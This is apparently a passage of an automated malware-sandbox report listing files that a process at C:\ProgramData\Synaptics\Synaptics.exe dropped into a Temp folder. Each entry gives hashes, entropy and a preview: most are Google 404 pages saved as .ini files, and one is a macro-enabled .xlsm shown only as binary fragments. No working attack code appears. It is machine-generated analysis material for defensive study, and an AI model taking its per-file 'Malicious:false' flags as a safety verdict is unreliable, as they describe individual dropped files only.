                                                                                                                                                                    SHA1:330294DC13DB5E20B4DAED5E31308975490FAB8B
                                                                                                                                                                    SHA-256:05504DB4B9F2C0677E66C94393002102283F54C9F00783A30542EA5089376205
                                                                                                                                                                    SHA-512:1B263632A62AF11615517A6FA0802C746A92AAE4DAA059661A5051F637AAB8E8E86C2E716EBBA99CC18376C26CBC2FD168A2FC4ADB885A57670BC0A5DF55E577
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="i4YwrAuG6u03n7Fn1SCcew">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\ExGwSS3.ini

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.268140631049004
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0RhSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+kh+pAZewRDK4mW
                                                                                                                                                                    MD5:A28CF63028132CD7E827B5E60EA5ADB4
                                                                                                                                                                    SHA1:19F481E8D0EC86F459BAEFDC48E55225A3915C72
                                                                                                                                                                    SHA-256:C1B86E194A1D5EFAE83F8898A86BC819B5696A033633E9D8C2B6EA0F756A0870
                                                                                                                                                                    SHA-512:6A368C5A2B5B737F9676EB1AAF610D9A22A38DF3B84B215F7166FC3BC2888AEB56E7D877A0F1D9719996C4C5475EB6D8A7D7FFCE84EAC7BDDA3AD8D61265B23C
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="oUFvwpx_YZvaU2XWCWVpGA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\F8fFlKe.ini

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.275791221413178
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0BOWSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK++OW+pAZewRDK4mW
                                                                                                                                                                    MD5:9B4A0E4D153D9E7E6DEA46695D23E62A
                                                                                                                                                                    SHA1:3EF7A3A3E592C57B4FAA07B21A5A96A2771DD23F
                                                                                                                                                                    SHA-256:206E6BF99B555FFC1BE8037A1249FF91B4D28086C2B599133032238E9F49457C
                                                                                                                                                                    SHA-512:FD606B455614DD60BDA86B85F20417EDFC490A6DCFABB9BAACA3EE9CE078764A6CD71446FE7BCC92B8CD618400C06F299F1094CB2C6B87E42706906218EFCC90
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="66KIQvEQsbBULqmtRhVqQQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\FHfEA7As.xlsm

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:Microsoft Excel 2007+
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):18387
                                                                                                                                                                    Entropy (8bit):7.523057953697544
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                                                                                    MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                                                                                    SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                                                                                    SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                                                                                    SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\GM1F43a.ini

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.250526025748348
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0wSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+b+pAZewRDK4mW
                                                                                                                                                                    MD5:FF19717213C531E0EE021F816013AC21
                                                                                                                                                                    SHA1:2E8ACF27E57B465A8C15C084ABEC90B94E41AAC9
                                                                                                                                                                    SHA-256:8AA105D4F0A170C082EBE9BB54ACF7AA319643B95AE98E394B07432364B71698
                                                                                                                                                                    SHA-512:5388C4E6E42FC13CF76EFC19A94ECF4EEEC480B51AD9E1DAA5773648C46CA88AF0E9BEDD1998F91902A9F2AAEB5AEBEA7D8E3FB685334C795CC3F4CE9D3813CF
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="tAKtJO5Kmo-iNiKpyAKdfg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\JOcq2kE.ini

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.263817067225485
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0BuDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK++e+pAZewRDK4mW
                                                                                                                                                                    MD5:E7B43C65D1096D4CAB6C669FC2D9489A
                                                                                                                                                                    SHA1:D1CD95BDDF92C86B88B41A8C5B7DF908AAD391F9
                                                                                                                                                                    SHA-256:E7F2E5799F47D8F5B28EB0B3E8E0FA7EAAD870919B2D6E9C901B5657646446B0
                                                                                                                                                                    SHA-512:DC938706961706083C3A892AE82936A2E2B43816EAEEB4473209CD1442063CE649D3F9BF6566B9B839151A20D324D5B936F1730F5265A26E5422EFAB91C1805E
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="65apdYHOVuCsAZl-6xSmSg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\JzWLOo8.ini

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.2566486908350765
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0+dSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+l+pAZewRDK4mW
                                                                                                                                                                    MD5:43DDE0A9ED85A721AC7E99BEB21E2206
                                                                                                                                                                    SHA1:5141B82A14A60391F1C4E4FCAFDE8632C3696047
                                                                                                                                                                    SHA-256:0BD3E2F86C80244C5B9C160CEAA195B3E5DFF9F3C4EABD3EC1F9B7D114DD99EB
                                                                                                                                                                    SHA-512:4028444007E717296212B25B909BF99227D98F9B9CB45D0951A657839F686C7D27841F3C6A535C01C37E87533F0239228ABF497C199C8C64EA3756FCFC5B0D48
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="QsEgwgBCVE_zaP-b70BtnQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\M8F4Jct.ini

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.251392792078042
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+03iSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Z+pAZewRDK4mW
                                                                                                                                                                    MD5:523C3BF1D0486D03E58E822F7DF35C85
                                                                                                                                                                    SHA1:B8081C626B808B8747B5F634C298E6A82FDAC1D9
                                                                                                                                                                    SHA-256:6CA4583327D06B66861DE2A470D16DD3A72AAB9FB5428C12849D359EDB55BDF3
                                                                                                                                                                    SHA-512:37A094F49D26F49916F6503D73888A839C6A9D0DDD8C38E68B0340898A93D9694E81FE8BFC59BA02FAB343EF11AF15846CFE5259D77F4FFDB70E793BACA6BA20
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="v-Gzv4mRnhRb3sltQBkQxw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\MC1KgdQ.ini

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.253559674386249
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0YSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+D+pAZewRDK4mW
                                                                                                                                                                    MD5:ACA3C81615E5B831B415888FA4CA8E83
                                                                                                                                                                    SHA1:F465FB38BEEADC145ECCC64014C1431D6D06285D
                                                                                                                                                                    SHA-256:756021E3011195E950DFC8E2FD4EF8DE76B84AEE37A45BD8237BF40AEEFD43DE
                                                                                                                                                                    SHA-512:EEBB32BEFAE8269ABFAA665D78E1A2E336F6D739E560749C7D5E82D5F402C66501DC7C1336B0E6A90E06E2E5FBCA557F05B57E3AB30EDF08B95A8943EBBB300C
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="NlWpwx7rg_tBi0JrEf7WMQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\MmWs12E.ini

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.270649448348446
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0LUSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+7+pAZewRDK4mW
                                                                                                                                                                    MD5:C7991CDE4C7F929AC6054CCA0AD288B7
                                                                                                                                                                    SHA1:4683E42B9FFAFB48316A7F186D960B35985109AF
                                                                                                                                                                    SHA-256:193B6DA46B928365E9768BBA8595628097BC054AEBD7B411DDE233768E9D6F0E
                                                                                                                                                                    SHA-512:8BC0B3C820A3B5218047BC248595F260133596634B524056D8EF59D0A7CB64B800C5294E1C448EB88AC64AD15988D1315955BAE275C6910D4BBA334FD4BF6363
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="II67g99-sxAL1P7HCOqG5w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\P3SlXP5.ini

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.258253142766805
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0CSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Z+pAZewRDK4mW
                                                                                                                                                                    MD5:D30874C5DB3654040831053FA06A5112
                                                                                                                                                                    SHA1:A1FF9B25A2B798E945EB253AAB1123952D339044
                                                                                                                                                                    SHA-256:8F3D02A497321EF63C0C8AFEE458D9D8FC55F30765EB42EF5F4B041264EACCC8
                                                                                                                                                                    SHA-512:A91091000980C03739B0632622112BBB87FD3472C337315C26DCD14DA0CD735C723E1726D8C8B160A4495017BAC35A2585D739B17929FC96788FCEDE9C674654
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="NVbOmSpR8MvV-ywxLesdYg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\RKunYJS.ini

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.264228912449142
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0MUSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+VU+pAZewRDK4mW
                                                                                                                                                                    MD5:7D1B41E437D697036734D2C4546CD31E
                                                                                                                                                                    SHA1:FE5C732736800605A5BB89C7223B0BAA3DC1912B
                                                                                                                                                                    SHA-256:FA1D467A5C970EBC2A83F2A8A76D159E2591416213C07E94FECB38FC4ECB1CD1
                                                                                                                                                                    SHA-512:E62AF3A2E7A99F245D55B79C72835315982C74D4D1C6587609F35E7F7C5B911833020E47E19D1D80AAF92A0BCC0ACC10E6DC9A3CDEDD6D8C7CF21B51DD306A03
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="2ABjCP3h9UT6_wI2w2gfiw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\Slo9zlS.ini

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.261083133892779
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0BSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+m+pAZewRDK4mW
                                                                                                                                                                    MD5:014F486DA9F7960C7EFBA278E58CBE10
                                                                                                                                                                    SHA1:BB6FE08C08E1DAD8E25F107827066296ECDD97FA
                                                                                                                                                                    SHA-256:32401B42437751E17B5CC9F78C7381AE32CD5919CA0A5C9707D56768EE97B404
                                                                                                                                                                    SHA-512:B401B3489985420FC29B7BEFC278675BE675F74BA5C72F90C45A6DF1F2C98B29B01A1C5F10E5151FF80DE205AC4A87D8E4EEAAEC82317AFC462B8A567C193DA5
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="93kKKwCTzpIUR9hqmmGgxw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\WiQC6aG.ini

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.272226940552205
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0oxDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+txD+pAZewRDK4mW
                                                                                                                                                                    MD5:808857BF8D5CD1F028B67446D0C9EA5E
                                                                                                                                                                    SHA1:F3926FC28404EC19A01BDA89527AF13C6F37230A
                                                                                                                                                                    SHA-256:41CB0CE2FC1DB090E463282FDD0255A7A0F8A414E9C1031209E48AE725358B5A
                                                                                                                                                                    SHA-512:7B7B1877696034EC458892B96E5102A290CB0B34D29454638689AFA6A82CA098B1FC0CE283BBE611E8BF4318249D7AE190698293946E8B8F0E3EC42009AD25C3
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="IKkkCkYAdpM7tO-KJRVypA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\X8UKyX5.ini

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.275998834181656
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0T0hSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+aW+pAZewRDK4mW
                                                                                                                                                                    MD5:A7E01E9E4C9D112C5F1A92BEE4869C93
                                                                                                                                                                    SHA1:C9FB3E510A7C6B518A5397A4FF2E5D9146FD622C
                                                                                                                                                                    SHA-256:659C169700E7283A7EA9D8020505694412772A9A580E932077BE72AF5CC5D1D7
                                                                                                                                                                    SHA-512:A7D29C28DC277939024E9C39F8F31A6B788999C2AD04E5A65FCB61D43DC2EDD3D7BECA6A662A186123C8A10A3CE6F9867AC3982132CE52433096136B0693BE17
                                                                                                                                                                    Malicious:false
